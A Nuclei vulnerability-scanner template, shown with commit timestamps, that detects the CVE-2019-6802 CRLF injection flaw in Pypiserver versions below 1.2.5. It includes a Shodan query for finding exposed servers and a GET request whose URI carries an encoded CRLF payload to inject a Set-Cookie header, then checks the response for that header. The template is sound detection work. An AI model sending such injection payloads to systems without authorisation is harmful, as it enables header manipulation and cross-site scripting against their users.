nuclei-templates/http/cves/2019/CVE-2019-6802.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2022-12-05 23:32:40 +00:00
id: CVE-2019-6802
info:
name: Pypiserver <1.2.5 - Carriage Return Line Feed Injection
2022-12-05 23:32:40 +00:00
author: 0x_Akoko
severity: medium
2022-12-06 09:22:05 +00:00
description: |
Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.
2022-12-05 23:32:40 +00:00
reference:
- https://vuldb.com/?id.130257
- https://github.com/pypiserver/pypiserver/issues/237
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
2022-12-05 23:32:40 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-12-05 23:32:40 +00:00
cve-id: CVE-2019-6802
2023-07-11 19:49:27 +00:00
cwe-id: CWE-74
epss-score: 0.00113
cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:*
2022-12-06 09:22:05 +00:00
metadata:
max-request: 1
2022-12-06 09:22:05 +00:00
shodan-query: html:"pypiserver"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: python
product: pypiserver
2022-12-05 23:32:40 +00:00
tags: cve,cve2019,crlf,generic,pypiserver
http:
2022-12-05 23:32:40 +00:00
- method: GET
path:
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
2022-12-06 06:25:31 +00:00
2022-12-05 23:32:40 +00:00
matchers:
2022-12-06 06:25:31 +00:00
- type: word
2022-12-05 23:32:40 +00:00
part: header
2022-12-06 06:25:31 +00:00
words:
- 'Set-Cookie: crlfinjection=1;'